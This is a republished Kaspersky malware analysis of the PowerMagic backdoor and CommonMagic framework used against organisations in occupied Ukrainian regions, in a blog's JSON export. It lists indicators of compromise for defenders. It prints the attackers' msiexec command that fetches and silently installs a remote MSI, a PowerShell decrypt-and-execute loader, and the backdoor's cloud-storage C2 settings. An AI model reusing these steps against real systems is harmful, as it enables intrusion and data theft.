{"id":12221,"date":"2023-04-26T07:50:18","date_gmt":"2023-04-26T10:50:18","guid":{"rendered":"https:\/\/www.fie.undef.edu.ar\/ceptm\/?p=12221"},"modified":"2023-04-26T07:50:18","modified_gmt":"2023-04-26T10:50:18","slug":"entidades-administrativas-ucranianas-fueron-atacadas-con-la-puerta-trasera-powermagic","status":"publish","type":"post","link":"https:\/\/www.fie.undef.edu.ar\/ceptm\/?p=12221","title":{"rendered":"Ukrainian administrative entities were attacked with the PowerMagic backdoor"},"content":{"rendered":"<p>Since the beginning of the Russo-Ukrainian conflict, Kaspersky researchers and the international community at large have identified a significant number of cyberattacks carried out in this particular political and geopolitical context. Now, new attacks, tied to some form of decoy, open backdoors on the infected systems.<\/p>\n<hr \/>\n<p>Since the start of the Russo-Ukrainian conflict, <a href=\"https:\/\/securelist.com\/elections-goransom-and-hermeticwiper-attack\/105960\/\" target=\"_blank\" rel=\"noopener\">Kaspersky researchers<\/a> and the international community at large have identified a significant number of cyberattacks executed in a political and geopolitical context. We previously published an <a href=\"https:\/\/securelist.com\/evaluation-of-cyber-activities-and-the-threat-landscape-in-ukraine\/106484\/\" target=\"_blank\" rel=\"noopener\">overview of cyber activities and the threat landscape<\/a> related to the conflict between Russia and Ukraine and continue to monitor new threats in these regions.<\/p>\n<p>In October 2022, we identified an active infection of government, agriculture and transportation organizations located in the Donetsk, Lugansk, and Crimea regions. 
Although the initial vector of compromise is unclear, the details of the next stage imply the use of spear phishing or similar methods. The victims navigated to a URL pointing to a ZIP archive hosted on a malicious web server. The archive, in turn, contained two files:<\/p>\n<ul>\n<li>A decoy document (we discovered PDF, XLSX and DOCX versions)<\/li>\n<li>A malicious LNK file with a double extension (e.g., .pdf.lnk) that leads to infection when opened<\/li>\n<\/ul>\n<figure id=\"attachment_12223\" aria-describedby=\"caption-attachment-12223\" style=\"width: 689px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" class=\"size-full wp-image-12223\" src=\"https:\/\/www.fie.undef.edu.ar\/ceptm\/wp-content\/uploads\/2023\/04\/CommonMagic_backdoor_01.png\" alt=\"\" width=\"689\" height=\"73\" srcset=\"https:\/\/www.fie.undef.edu.ar\/ceptm\/wp-content\/uploads\/2023\/04\/CommonMagic_backdoor_01.png 689w, https:\/\/www.fie.undef.edu.ar\/ceptm\/wp-content\/uploads\/2023\/04\/CommonMagic_backdoor_01-300x32.png 300w\" sizes=\"(max-width: 689px) 100vw, 689px\" \/><figcaption id=\"caption-attachment-12223\" class=\"wp-caption-text\">Malicious ZIP archive<\/figcaption><\/figure>\n<figure id=\"attachment_12224\" aria-describedby=\"caption-attachment-12224\" style=\"width: 784px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" class=\"size-full wp-image-12224\" src=\"https:\/\/www.fie.undef.edu.ar\/ceptm\/wp-content\/uploads\/2023\/04\/CommonMagic_backdoor_02.png\" alt=\"\" width=\"784\" height=\"881\" srcset=\"https:\/\/www.fie.undef.edu.ar\/ceptm\/wp-content\/uploads\/2023\/04\/CommonMagic_backdoor_02.png 784w, https:\/\/www.fie.undef.edu.ar\/ceptm\/wp-content\/uploads\/2023\/04\/CommonMagic_backdoor_02-267x300.png 267w, https:\/\/www.fie.undef.edu.ar\/ceptm\/wp-content\/uploads\/2023\/04\/CommonMagic_backdoor_02-768x863.png 768w\" sizes=\"(max-width: 784px) 100vw, 784px\" \/><figcaption id=\"caption-attachment-12224\" class=\"wp-caption-text\">Decoy Word document (subject: Results of the State Duma elections in the Republic of Crimea)<\/figcaption><\/figure>\n<p>In several cases, the contents of the decoy document were directly related to the name of the malicious LNK to trick the user into activating it. For example, one archive contained an LNK file named \u201c\u041f\u0440\u0438\u043a\u0430\u0437 \u041c\u0438\u043d\u0444\u0438\u043d\u0430 \u0414\u041d\u0420 \u2116 176.pdf.lnk\u201d (<a href=\"https:\/\/minfindnr.ru\/wp-content\/uploads\/2022\/09\/pr_176_ot_15-09-2022.pdf\" target=\"_blank\" rel=\"noopener\">Ministry of Finance Decree No. 176<\/a>), and the decoy document explicitly referenced it by name in the text.<\/p>\n<figure id=\"attachment_12225\" aria-describedby=\"caption-attachment-12225\" style=\"width: 692px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" class=\"size-full wp-image-12225\" src=\"https:\/\/www.fie.undef.edu.ar\/ceptm\/wp-content\/uploads\/2023\/04\/CommonMagic_backdoor_03.png\" alt=\"\" width=\"692\" height=\"593\" srcset=\"https:\/\/www.fie.undef.edu.ar\/ceptm\/wp-content\/uploads\/2023\/04\/CommonMagic_backdoor_03.png 692w, https:\/\/www.fie.undef.edu.ar\/ceptm\/wp-content\/uploads\/2023\/04\/CommonMagic_backdoor_03-300x257.png 300w\" sizes=\"(max-width: 692px) 100vw, 692px\" \/><figcaption id=\"caption-attachment-12225\" class=\"wp-caption-text\">Decoy PDF with reference to a malicious shortcut file (subject: information about DPR Ministry of Finance Decree No. 
176)<\/figcaption><\/figure>\n<p>The ZIP files were downloaded from various locations hosted on two domains: webservice-srv[.]online and webservice-srv1[.]online.<\/p>\n<p>Known attachment names, redacted to remove personal information:<\/p>\n<div class=\"c-table-wrapper\">\n<table width=\"100%\">\n<thead>\n<tr>\n<th width=\"70%\">MD5 (name)<\/th>\n<th width=\"30%\">First detection<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td>0a95a985e6be0918fdb4bfabf0847b5a (\u043d\u043e\u0432\u043e\u0435 \u043e\u0442\u043c\u0435\u043d\u0430 \u0440\u0435\u0448\u0435\u043d\u0438\u0439 \u0443\u0438\u043a 288.zip)<\/td>\n<td>2021-09-22 13:47<\/td>\n<\/tr>\n<tr>\n<td>ecb7af5771f4fe36a3065dc4d5516d84 (\u0432\u043d\u0435\u0441\u0435\u043d\u0438\u0435_\u0438\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u0439_\u0432_\u043e\u0442\u0434\u0435\u043b\u044c\u043d\u044b\u0435_\u0437\u0430\u043a\u043e\u043d\u043e\u0434\u0430\u0442\u0435\u043b\u044c\u043d\u044b\u0435_\u0430\u043a\u0442\u044b_\u0440\u0444.zip)<\/td>\n<td>2022-04-28 07:36<\/td>\n<\/tr>\n<tr>\n<td>765f45198cb8039079a28289eab761c5 (\u0433\u0440\u0430\u0436\u0434\u0430\u043d\u0438\u043d \u0440\u0431 (<em>redacted<\/em>) .zip)<\/td>\n<td>2022-06-06 11:40<\/td>\n<\/tr>\n<tr>\n<td>ebaf3c6818bfc619ca2876abd6979f6d (\u0446\u0438\u043a 3638.zip)<\/td>\n<td>2022-08-05 08:39<\/td>\n<\/tr>\n<tr>\n<td>1032986517836a8b1f87db954722a33f (\u0441\u0437 14-1519 \u043e\u0442 10.08.22.zip)<\/td>\n<td>2022-08-12 10:21<\/td>\n<\/tr>\n<tr>\n<td>1de44e8da621cdeb62825d367693c75e (\u043f\u0440\u0438\u043a\u0430\u0437 \u043c\u0438\u043d\u0444\u0438\u043d\u0430 \u0434\u043d\u0440 \u2116 176.zip)<\/td>\n<td>2022-09-23 08:10<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<p>When the potential victim activates the LNK file included in the ZIP file, it triggers a chain of events that leads to the infection of the computer with a previously unseen malicious framework that we named CommonMagic. 
The malware and techniques used in this campaign are not particularly sophisticated, but are effective, and the code has no direct relation to any known campaigns.<\/p>\n<figure id=\"attachment_12226\" aria-describedby=\"caption-attachment-12226\" style=\"width: 2430px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" class=\"size-full wp-image-12226\" src=\"https:\/\/www.fie.undef.edu.ar\/ceptm\/wp-content\/uploads\/2023\/04\/CommonMagic_backdoor_04.png\" alt=\"\" width=\"2430\" height=\"556\" srcset=\"https:\/\/www.fie.undef.edu.ar\/ceptm\/wp-content\/uploads\/2023\/04\/CommonMagic_backdoor_04.png 2430w, https:\/\/www.fie.undef.edu.ar\/ceptm\/wp-content\/uploads\/2023\/04\/CommonMagic_backdoor_04-300x69.png 300w, https:\/\/www.fie.undef.edu.ar\/ceptm\/wp-content\/uploads\/2023\/04\/CommonMagic_backdoor_04-1024x234.png 1024w, https:\/\/www.fie.undef.edu.ar\/ceptm\/wp-content\/uploads\/2023\/04\/CommonMagic_backdoor_04-768x176.png 768w, https:\/\/www.fie.undef.edu.ar\/ceptm\/wp-content\/uploads\/2023\/04\/CommonMagic_backdoor_04-1536x351.png 1536w, https:\/\/www.fie.undef.edu.ar\/ceptm\/wp-content\/uploads\/2023\/04\/CommonMagic_backdoor_04-2048x469.png 2048w\" sizes=\"(max-width: 2430px) 100vw, 2430px\" \/><figcaption id=\"caption-attachment-12226\" class=\"wp-caption-text\">Infection chain<\/figcaption><\/figure>\n<figure id=\"attachment_12227\" aria-describedby=\"caption-attachment-12227\" style=\"width: 1024px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" class=\"size-full wp-image-12227\" src=\"https:\/\/www.fie.undef.edu.ar\/ceptm\/wp-content\/uploads\/2023\/04\/CommonMagic_backdoor_05-1024x623-1.png\" alt=\"\" width=\"1024\" height=\"623\" srcset=\"https:\/\/www.fie.undef.edu.ar\/ceptm\/wp-content\/uploads\/2023\/04\/CommonMagic_backdoor_05-1024x623-1.png 1024w, https:\/\/www.fie.undef.edu.ar\/ceptm\/wp-content\/uploads\/2023\/04\/CommonMagic_backdoor_05-1024x623-1-300x183.png 300w, https:\/\/www.fie.undef.edu.ar\/ceptm\/wp-content\/uploads\/2023\/04\/CommonMagic_backdoor_05-1024x623-1-768x467.png 768w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption id=\"caption-attachment-12227\" class=\"wp-caption-text\">Installation workflow<\/figcaption><\/figure>\n<p>The malicious LNK points to a remotely hosted malicious MSI file that is downloaded and started by the Windows Installer executable.<\/p>\n<pre>%WINDIR%\\System32\\msiexec.exe \/i http:\/\/185.166.217[.]184\/CFVJKXIUPHESRHUSE4FHUREHUIFERAY97A4FXA\/attachment.msi \/quiet<\/pre>\n<p>The MSI file is effectively a dropper package, containing an encrypted next-stage payload (<strong>service_pack.dat<\/strong>), a dropper script (<strong>runservice_pack.vbs<\/strong>) and a decoy document that is supposed to be displayed to the victim.<\/p>\n<figure id=\"attachment_12228\" aria-describedby=\"caption-attachment-12228\" style=\"width: 788px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" class=\"size-full wp-image-12228\" src=\"https:\/\/www.fie.undef.edu.ar\/ceptm\/wp-content\/uploads\/2023\/04\/CommonMagic_backdoor_06.png\" alt=\"\" width=\"788\" height=\"66\" srcset=\"https:\/\/www.fie.undef.edu.ar\/ceptm\/wp-content\/uploads\/2023\/04\/CommonMagic_backdoor_06.png 788w, https:\/\/www.fie.undef.edu.ar\/ceptm\/wp-content\/uploads\/2023\/04\/CommonMagic_backdoor_06-300x25.png 300w, 
https:\/\/www.fie.undef.edu.ar\/ceptm\/wp-content\/uploads\/2023\/04\/CommonMagic_backdoor_06-768x64.png 768w\" sizes=\"(max-width: 788px) 100vw, 788px\" \/><figcaption id=\"caption-attachment-12228\" class=\"wp-caption-text\">Files contained in attachment.msi<\/figcaption><\/figure>\n<p>The encrypted payload and the decoy document are written to the folder named <strong>%APPDATA%\\WinEventCom<\/strong>. The VBS dropper script is, in turn, a wrapper for launching an embedded PowerShell script that decrypts the next stage using a simple one-byte XOR, launches it and deletes it from disk.<\/p>\n<p><strong>Decryption of service_pack.dat<\/strong><\/p>\n<pre>$inst=\"$env:APPDATA\\WinEventCom\\service_pack.dat\";\nif (!(Test-Path $inst)){\n  return;\n}\n# read the XOR-encrypted payload dropped by the MSI\n$binst=[System.IO.File]::ReadAllBytes($inst);\n$xbinst=New-Object Byte[] $binst.Count;\nfor ($i=0;$i -lt $binst.Count;$i++) {\n  # each assignment overwrites the previous one, so only the last XOR (0xFF) takes effect\n  $xbinst[$i]=$binst[$i] -bxor 0x13;\n  $xbinst[$i]=$binst[$i] -bxor 0x55;\n  $xbinst[$i]=$binst[$i] -bxor 0xFF;\n  $xbinst[$i]=$binst[$i] -bxor 0xFF;\n};\nTry {\n  # the decoded script is executed in memory via Invoke-Expression\n  [System.Text.Encoding]::ASCII.GetString($xbinst)|iex;\n}\nCatch {};\nStart-Sleep 3;\n# the encrypted payload is then removed from disk\nRemove-Item -Path $inst -Force<\/pre>\n<p>The next-stage script finalizes the installation: it opens the decoy document to display it to the user, writes two files named <strong>config<\/strong> and <strong>manutil.vbs<\/strong> to <strong>%APPDATA%\\WinEventCom<\/strong>, and creates a Task Scheduler job named <strong>WindowsActiveXTaskTrigger<\/strong> to execute the <strong>wscript.exe %APPDATA%\\WinEventCom\\manutil.vbs<\/strong> command every day.<\/p>\n<p id=\"the-powermagic-backdoor\"><strong>The PowerMagic backdoor<\/strong><\/p>\n<p>The script <strong>manutil.vbs<\/strong>, which is dropped by the initial package, is a loader for a previously unknown backdoor written in PowerShell that we named <strong>PowerMagic<\/strong>. The main body of the backdoor is read from the file <strong>%APPDATA%\\WinEventCom\\config<\/strong> and decrypted with a simple XOR (key: 0x10).<\/p>\n<p><strong>Snippet of PowerMagic\u2019s code containing the \u201cpowermagic\u201d string<\/strong><\/p>\n<pre>$AppDir='powermagic';\n$ClinetDir='client';\n$ClinetTaskDir='task';\n$ClinetResultDir='result';\n$ClientToken=redacted\n$dbx_up='https:\/\/content.dropboxapi.com\/2\/files\/upload';\n$dbx_down = 'https:\/\/content.dropboxapi.com\/2\/files\/download';<\/pre>\n<p>When started, the backdoor creates a mutex \u2013 <strong>WinEventCom<\/strong>. Then, it enters an infinite loop communicating with its C&amp;C server, receiving commands and uploading results in response. 
It uses OneDrive and Dropbox folders as transport, and OAuth refresh tokens as credentials.<\/p>\n<p data-gtm-vis-has-fired-11711842_122=\"1\">Every minute the backdoor performs the following actions:<\/p>\n<ol data-gtm-vis-has-fired-11711842_122=\"1\">\n<li data-gtm-vis-has-fired-11711842_122=\"1\">Modifies the heartbeat file located at \/$AppDir\/$ClientDir\/&lt;machine UID&gt; (the values of the $AppDir and $ClientDir PowerShell variables may differ between samples). The contents of this file consist of the backdoor PID and a number incremented by one with each file modification.<\/li>\n<li data-gtm-vis-has-fired-11711842_122=\"1\">Downloads commands that are stored as a file in the \/$AppDir\/$ClientTaskDir directory.<\/li>\n<li data-gtm-vis-has-fired-11711842_122=\"1\">Executes every command as a PowerShell script.<\/li>\n<li data-gtm-vis-has-fired-11711842_122=\"1\">Uploads the output of the executed PowerShell command to the cloud storage, placing it in the \/$AppDir\/$ClientResultDir\/&lt;victim machine UUID&gt;.&lt;timestamp&gt; file.<\/li>\n<\/ol>\n<p id=\"the-commonmagic-framework\" data-gtm-vis-has-fired-11711842_122=\"1\"><strong>The CommonMagic framework<\/strong><\/p>\n<p data-gtm-vis-has-fired-11711842_122=\"1\">As it turned out, PowerMagic was not the only malicious toolkit used by the actor. All the victims of PowerMagic were also infected with a more complicated, previously unseen, modular malicious framework that we named CommonMagic. 
This framework was deployed after initial infection with the PowerShell backdoor, leading us to believe that CommonMagic is deployed via PowerMagic.<\/p>\n<p data-gtm-vis-has-fired-11711842_122=\"1\">The CommonMagic framework consists of several executable modules, all stored in the directory\u00a0<strong data-gtm-vis-has-fired-11711842_122=\"1\">C:\\ProgramData\\CommonCommand<\/strong><strong data-gtm-vis-has-fired-11711842_122=\"1\">.\u00a0<\/strong>Modules start as standalone executable files and communicate via named pipes. There are dedicated modules for interaction with the C&amp;C server, encryption and decryption of the C&amp;C traffic and various malicious actions.<\/p>\n<p data-gtm-vis-has-fired-11711842_122=\"1\">The diagram below illustrates the architecture of the framework.<\/p>\n<figure id=\"attachment_12229\" aria-describedby=\"caption-attachment-12229\" style=\"width: 1024px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" class=\"size-full wp-image-12229\" src=\"https:\/\/www.fie.undef.edu.ar\/ceptm\/wp-content\/uploads\/2023\/04\/CommonMagic_backdoor_09-1024x568-1.png\" alt=\"\" width=\"1024\" height=\"568\" srcset=\"https:\/\/www.fie.undef.edu.ar\/ceptm\/wp-content\/uploads\/2023\/04\/CommonMagic_backdoor_09-1024x568-1.png 1024w, https:\/\/www.fie.undef.edu.ar\/ceptm\/wp-content\/uploads\/2023\/04\/CommonMagic_backdoor_09-1024x568-1-300x166.png 300w, https:\/\/www.fie.undef.edu.ar\/ceptm\/wp-content\/uploads\/2023\/04\/CommonMagic_backdoor_09-1024x568-1-768x426.png 768w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption id=\"caption-attachment-12229\" class=\"wp-caption-text\">Framework architecture<\/figcaption><\/figure>\n<p id=\"network-communication\" data-gtm-vis-has-fired-11711842_122=\"1\"><strong>Network communication<\/strong><\/p>\n<p data-gtm-vis-has-fired-11711842_122=\"1\">The framework uses OneDrive remote folders as a transport. 
It utilizes\u00a0<a href=\"https:\/\/learn.microsoft.com\/en-us\/graph\/use-the-api\" target=\"_blank\" rel=\"noopener\" data-gtm-vis-has-fired-11711842_122=\"1\">the Microsoft Graph API<\/a>\u00a0using an OAuth refresh token embedded into the module binary for authentication. The\u00a0<a href=\"https:\/\/rapidjson.org\/\" target=\"_blank\" rel=\"noopener\" data-gtm-vis-has-fired-11711842_122=\"1\">RapidJSON library<\/a>\u00a0is used for parsing JSON objects returned by the Graph API.<\/p>\n<p data-gtm-vis-has-fired-11711842_122=\"1\">A dedicated heartbeat thread updates the remote file\u00a0<strong data-gtm-vis-has-fired-11711842_122=\"1\">&lt;victim ID&gt;\/S\/S.txt<\/strong>\u00a0every five minutes with the local timestamp of the victim.<\/p>\n<p data-gtm-vis-has-fired-11711842_122=\"1\">Then, in separate threads, the network communication module downloads new executable modules from the directory\u00a0<strong data-gtm-vis-has-fired-11711842_122=\"1\">&lt;victim ID&gt;\/M\u00a0<\/strong>and uploads the results of their execution to the directory\u00a0<strong data-gtm-vis-has-fired-11711842_122=\"1\">&lt;victim ID&gt;\/R.<\/strong><\/p>\n<p data-gtm-vis-has-fired-11711842_122=\"1\">The data exchanged with the operator via the OneDrive location is encrypted using the RC5Simple open-source library. By default, this library uses the seven-byte sequence \u201cRC5SIMP\u201d at the beginning of the encrypted sequence, but the developers of the backdoor changed it to \u201cHwo7X8p\u201d. 
Encryption is implemented in a separate process, communicating over the pipes named\u00a0<strong data-gtm-vis-has-fired-11711842_122=\"1\">\\\\.\\pipe\\PipeMd<\/strong>\u00a0and\u00a0<strong data-gtm-vis-has-fired-11711842_122=\"1\">\\\\.\\pipe\\PipeCrDtMd.<\/strong><\/p>\n<p id=\"plugins\" data-gtm-vis-has-fired-11711842_122=\"1\"><strong>Plugins<\/strong><\/p>\n<p data-gtm-vis-has-fired-11711842_122=\"1\">So far, we have discovered two plugins implementing the malicious business logic. They are located in the directory\u00a0<strong data-gtm-vis-has-fired-11711842_122=\"1\">C:\\ProgramData\\CommonCommand\\Other<\/strong>.<\/p>\n<ul data-gtm-vis-has-fired-11711842_122=\"1\">\n<li data-gtm-vis-has-fired-11711842_122=\"1\"><strong data-gtm-vis-has-fired-11711842_122=\"1\">Screenshot (S.exe)<\/strong>\u00a0\u2013 takes screenshots every three seconds using the GDI API<\/li>\n<li data-gtm-vis-has-fired-11711842_122=\"1\"><strong data-gtm-vis-has-fired-11711842_122=\"1\">USB (U.exe)<\/strong>\u00a0\u2013 collects the contents of the files with the following extensions from connected USB devices:\u00a0<strong data-gtm-vis-has-fired-11711842_122=\"1\">.doc, .docx. .xls, .xlsx, .rtf, .odt, .ods, .zip, .rar, .txt, .pdf.<\/strong><\/li>\n<\/ul>\n<p id=\"to-be-continued\" data-gtm-vis-has-fired-11711842_122=\"1\"><strong>To be continued<\/strong><\/p>\n<p data-gtm-vis-has-fired-11711842_122=\"1\">So far, we have found no direct links between the samples and data used in this campaign and any previously known actors. However, the campaign is still active, and our investigation continues. 
So, we believe that further discoveries may reveal additional information about this malware and the threat actor behind it.<\/p>\n<p id=\"commonmagic-indicators-of-compromise\" data-gtm-vis-has-fired-11711842_122=\"1\"><strong>CommonMagic indicators of compromise<\/strong><\/p>\n<p data-gtm-vis-has-fired-11711842_122=\"1\"><strong data-gtm-vis-has-fired-11711842_122=\"1\">Lure archives<\/strong><br data-gtm-vis-has-fired-11711842_122=\"1\" \/><a href=\"https:\/\/opentip.kaspersky.com\/0a95a985e6be0918fdb4bfabf0847b5a\/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL\" target=\"_blank\" rel=\"noopener\" data-gtm-vis-has-fired-11711842_122=\"1\">0a95a985e6be0918fdb4bfabf0847b5a<\/a>\u00a0\u043d\u043e\u0432\u043e\u0435 \u043e\u0442\u043c\u0435\u043d\u0430 \u0440\u0435\u0448\u0435\u043d\u0438\u0439 \u0443\u0438\u043a 288.zip (new cancellation of resolution local election committee 288.zip)<br data-gtm-vis-has-fired-11711842_122=\"1\" \/><a href=\"https:\/\/opentip.kaspersky.com\/ecb7af5771f4fe36a3065dc4d5516d84\/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL\" target=\"_blank\" rel=\"noopener\" data-gtm-vis-has-fired-11711842_122=\"1\">ecb7af5771f4fe36a3065dc4d5516d84<\/a>\u00a0\u0432\u043d\u0435\u0441\u0435\u043d\u0438\u0435_\u0438\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u0439_\u0432_\u043e\u0442\u0434\u0435\u043b\u044c\u043d\u044b\u0435_\u0437\u0430\u043a\u043e\u043d\u043e\u0434\u0430\u0442\u0435\u043b\u044c\u043d\u044b\u0435_\u0430\u043a\u0442\u044b_\u0440\u0444.zip (making changes to several russian federation laws.zip)<br data-gtm-vis-has-fired-11711842_122=\"1\" \/><a href=\"https:\/\/opentip.kaspersky.com\/765f45198cb8039079a28289eab761c5\/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL\" target=\"_blank\" rel=\"noopener\" data-gtm-vis-has-fired-11711842_122=\"1\">765f45198cb8039079a28289eab761c5<\/a>\u00a0\u0433\u0440\u0430\u0436\u0434\u0430\u043d\u0438\u043d \u0440\u0431 (redacted) .zip (citizen of republic of belarus (redacted).zip)<br 
data-gtm-vis-has-fired-11711842_122=\"1\" \/><a href=\"https:\/\/opentip.kaspersky.com\/ebaf3c6818bfc619ca2876abd6979f6d\/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL\" target=\"_blank\" rel=\"noopener\" data-gtm-vis-has-fired-11711842_122=\"1\">ebaf3c6818bfc619ca2876abd6979f6d<\/a>\u00a0\u0446\u0438\u043a 3638.zip (central election committee 3638.zip)<br data-gtm-vis-has-fired-11711842_122=\"1\" \/><a href=\"https:\/\/opentip.kaspersky.com\/1032986517836a8b1f87db954722a33f\/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL\" target=\"_blank\" rel=\"noopener\" data-gtm-vis-has-fired-11711842_122=\"1\">1032986517836a8b1f87db954722a33f<\/a>\u00a0\u0441\u0437 14-1519 \u043e\u0442 10.08.22.zip (memo 14-1519 dated 10.08.22.zip)<br data-gtm-vis-has-fired-11711842_122=\"1\" \/><a href=\"https:\/\/opentip.kaspersky.com\/1de44e8da621cdeb62825d367693c75e\/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL\" target=\"_blank\" rel=\"noopener\" data-gtm-vis-has-fired-11711842_122=\"1\">1de44e8da621cdeb62825d367693c75e<\/a>\u00a0\u043f\u0440\u0438\u043a\u0430\u0437 \u043c\u0438\u043d\u0444\u0438\u043d\u0430 \u0434\u043d\u0440 \u2116 176.zip (dpr ministry of finance order #176.zip)<\/p>\n<p data-gtm-vis-has-fired-11711842_122=\"1\"><strong data-gtm-vis-has-fired-11711842_122=\"1\">PowerMagic installer<\/strong><br data-gtm-vis-has-fired-11711842_122=\"1\" \/><a href=\"https:\/\/opentip.kaspersky.com\/fee3db5db8817e82b1af4cedafd2f346\/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL\" target=\"_blank\" rel=\"noopener\" data-gtm-vis-has-fired-11711842_122=\"1\">fee3db5db8817e82b1af4cedafd2f346<\/a>\u00a0attachment.msi<\/p>\n<p data-gtm-vis-has-fired-11711842_122=\"1\"><strong data-gtm-vis-has-fired-11711842_122=\"1\">PowerMagic dropper<\/strong><br data-gtm-vis-has-fired-11711842_122=\"1\" \/><a href=\"https:\/\/opentip.kaspersky.com\/bec44b3194c78f6e858b1768c071c5db\/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL\" target=\"_blank\" rel=\"noopener\" 
data-gtm-vis-has-fired-11711842_122=\"1\">bec44b3194c78f6e858b1768c071c5db<\/a>\u00a0service_pack.dat<\/p>\n<p data-gtm-vis-has-fired-11711842_122=\"1\"><strong data-gtm-vis-has-fired-11711842_122=\"1\">PowerMagic loader<\/strong><br data-gtm-vis-has-fired-11711842_122=\"1\" \/><a href=\"https:\/\/opentip.kaspersky.com\/8c2f5e7432f1e6ad22002991772d589b\/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL\" target=\"_blank\" rel=\"noopener\" data-gtm-vis-has-fired-11711842_122=\"1\">8c2f5e7432f1e6ad22002991772d589b<\/a>\u00a0manutil.vbs<\/p>\n<p data-gtm-vis-has-fired-11711842_122=\"1\"><strong data-gtm-vis-has-fired-11711842_122=\"1\">PowerMagic backdoor<\/strong><br data-gtm-vis-has-fired-11711842_122=\"1\" \/><a href=\"https:\/\/opentip.kaspersky.com\/1fe3a2502e330432f3cf37ca7acbffac\/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL\" target=\"_blank\" rel=\"noopener\" data-gtm-vis-has-fired-11711842_122=\"1\">1fe3a2502e330432f3cf37ca7acbffac<\/a><\/p>\n<p data-gtm-vis-has-fired-11711842_122=\"1\"><strong data-gtm-vis-has-fired-11711842_122=\"1\">CommonMagic loader<\/strong><br data-gtm-vis-has-fired-11711842_122=\"1\" \/><a href=\"https:\/\/opentip.kaspersky.com\/ce8d77af445e3a7c7e56a6ea53af8c0d\/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL\" target=\"_blank\" rel=\"noopener\" data-gtm-vis-has-fired-11711842_122=\"1\">ce8d77af445e3a7c7e56a6ea53af8c0d<\/a>\u00a0All.exe<\/p>\n<p data-gtm-vis-has-fired-11711842_122=\"1\"><strong data-gtm-vis-has-fired-11711842_122=\"1\">CommonMagic cryptography module<\/strong><br data-gtm-vis-has-fired-11711842_122=\"1\" \/><a href=\"https:\/\/opentip.kaspersky.com\/9e19fe5c3cf3e81f347dd78cf3c2e0c2\/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL\" target=\"_blank\" rel=\"noopener\" data-gtm-vis-has-fired-11711842_122=\"1\">9e19fe5c3cf3e81f347dd78cf3c2e0c2<\/a>\u00a0Clean.exe<\/p>\n<p data-gtm-vis-has-fired-11711842_122=\"1\"><strong data-gtm-vis-has-fired-11711842_122=\"1\">CommonMagic network communication 
module<\/strong><br data-gtm-vis-has-fired-11711842_122=\"1\" \/><a href=\"https:\/\/opentip.kaspersky.com\/7c0e5627fd25c40374bc22035d3fadd8\/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL\" target=\"_blank\" rel=\"noopener\" data-gtm-vis-has-fired-11711842_122=\"1\">7c0e5627fd25c40374bc22035d3fadd8<\/a>\u00a0Overall.exe<\/p>\n<p data-gtm-vis-has-fired-11711842_122=\"1\"><strong data-gtm-vis-has-fired-11711842_122=\"1\">Distribution servers<\/strong><br data-gtm-vis-has-fired-11711842_122=\"1\" \/>webservice-srv[.]online<br data-gtm-vis-has-fired-11711842_122=\"1\" \/>webservice-srv1[.]online<br data-gtm-vis-has-fired-11711842_122=\"1\" \/>185.166.217[.]184<\/p>\n<p><strong>Fuente:<\/strong> <a href=\"https:\/\/securelist.com\/bad-magic-apt\/109087\/\" target=\"_blank\" rel=\"noopener\"><em>https:\/\/securelist.com<\/em><\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Desde el comienzo del conflicto ruso-ucraniano, los investigadores de Kaspersky y la comunidad internacional en general han identificado una cantidad significativa de ciberataques ejecutados en&hellip; 
<\/p>\n","protected":false},"author":1,"featured_media":12222,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":[],"categories":[23,28],"tags":[],"_links":{"self":[{"href":"https:\/\/www.fie.undef.edu.ar\/ceptm\/index.php?rest_route=\/wp\/v2\/posts\/12221"}],"collection":[{"href":"https:\/\/www.fie.undef.edu.ar\/ceptm\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.fie.undef.edu.ar\/ceptm\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.fie.undef.edu.ar\/ceptm\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.fie.undef.edu.ar\/ceptm\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=12221"}],"version-history":[{"count":1,"href":"https:\/\/www.fie.undef.edu.ar\/ceptm\/index.php?rest_route=\/wp\/v2\/posts\/12221\/revisions"}],"predecessor-version":[{"id":12230,"href":"https:\/\/www.fie.undef.edu.ar\/ceptm\/index.php?rest_route=\/wp\/v2\/posts\/12221\/revisions\/12230"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.fie.undef.edu.ar\/ceptm\/index.php?rest_route=\/wp\/v2\/media\/12222"}],"wp:attachment":[{"href":"https:\/\/www.fie.undef.edu.ar\/ceptm\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=12221"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.fie.undef.edu.ar\/ceptm\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1222